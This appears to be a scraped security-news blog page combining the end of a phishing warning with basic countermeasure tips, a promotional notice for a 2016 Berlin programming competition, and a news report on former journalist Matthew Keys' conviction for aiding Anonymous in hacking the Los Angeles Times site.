You can in the first image, reported fake website has successfully manage too push itself above the Original Google Adwords link on Google SERP.


Phishing Countermeasures:

• Always check Https
• Do not click on links, download files or open attachments in emails from unknown senders
• Do not follow any hyperlinks or URLs
• Do not copy any website addresses from a pop-up window into your browser.

What is Phishing ?
Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.


About the Author:
Priyanshu Sahay, Founder of HackersOnlineClub (HOC) and professionally Cyber Security Expert.
Connect me: Facebook, Twitter

To Be A Part of International Programmer Player Competition And Win upto $500,000

To Be A Part of International Programmer Player Competition (IPPC) And Win upto $500,000

Faced with time Programmers and Hackers:
Speed & Skill Battle for $500.000

We are already convinced that there are many gifted programmers and ingenious hackers.
Now we want to know who the fastest and most flexible are.
After all, we are in the century of speed: TIME = $

Next Hacker IPPC: International Programming Player Competition, February 26 & 27, 2016 in Berlin, Germany, the 2016 IPPC promises an exciting two days of intriguing events and programming competitions featuring 3,000 of the world’s best up and coming developers and programmers in an extreme and exciting skill competition.

IPPC’s main event is where the true competition really begins and everyone can be a winner in the Xtrem Programming Competition Speed & Skill Challenge. $500.000 cash prize they await the winners. This multi-stage challenge starts with each programmer having to successfully find and fix errors in three random Java programs. Once that phase is completed, the programmer needs to achieve a score of 150,000 points in a single Classic Pac-Man game.  Once both tasks are completed, the fastest programmers win a share of the cash pool.  In addition, contestants’ contest performance information will be made available for all Company's.

The 2016 International Programming Player Competition will also offer technical sessions on programming, an open panel discussion with renowned hackers and programmers, and the opportunity for the world’s top programmers to be exposed to and meet leading high tech companies from around the globe. The two day IPPC is open to programmers worldwide and space is filling up rapidly. All the money from our sponsors and advertisements that will be gathered will increase the winner’s number.

About Next Hacker IPPS
Next Hacker IPPS LDT is a worldwide group of like-minded computer programmers. Their mission is to organize and host international programming events that connect talented programmers with corporations. The team specializes in planning and producing high quality competitive programming events. We live and breathe inspiring events, we love them, and it’s all we do.

Contact Details
Email: team@nexthacker.com
Website: http://www.nexthacker.com

NEXTHACKER IPPC LTD
Miami - 201 South Biscayne Boulevard - USA / Athens - Prasinou Lofou- Theatre Square (Minoti)- Greece / Sofia - Business Center Evrotur 2 – Bulgaria
Lisa Novichenko

Contest Director
Tel. +30 211 2104995

Former Reuters Journalist Convicted of Helping Anonymous To Hack Los Angeles Times Website

Former Reuters Journalist Convicted of Helping Anonymous To Hack Los Angeles Times Website.

Matthew Keys, age 28 from California was found guilty of giving login credentials to the Tribune Co.'s computer system. 

Matthew will face up to 25 years in prison, and sentenced on 20 January 2016. He charged for computer hacking under the Computer Fraud & Abuse Act.

According to FoxNews,

He was fired by Tribune-owned FOX affiliate KTXL-TV in Sacramento two months before the Times' website was hacked, and federal prosecutors in Sacramento say he wanted payback. He was fired by the Reuters news agency after charges were filed in 2013.

A spokesman for Tribune Media Co, Gary Weitman, said: "We are pleased that the justice system worked. We will let today's verdict speak for itself."

Edward Snowden Tweeted

For defacing an @LATimes article for 40 minutes, journo @MatthewKeysLive faces 25 years. Years. #PrisonPolicy https://t.co/Ae9YszVEiH

— Edward Snowden (@Snowden) October 7, 2015

Matthew also gives his reaction with tweeted,

That was bullshit.

— Matthew Keys (@MatthewKeysLive) October 7, 2015

About the Tribune Company 
Tribune Company, is an American multimedia corporation that is headquartered in Chicago, Illinois, United States. Tribune Media is one of the largest television broadcasting companies, owning 39 television stations across the United States and operating three additional stations through local marketing agreements. Tribune Technology LLC, another subsidiary, manages the interactive operations of major daily newspapers such as the Chicago Tribune and Los Angeles Times and their associated websites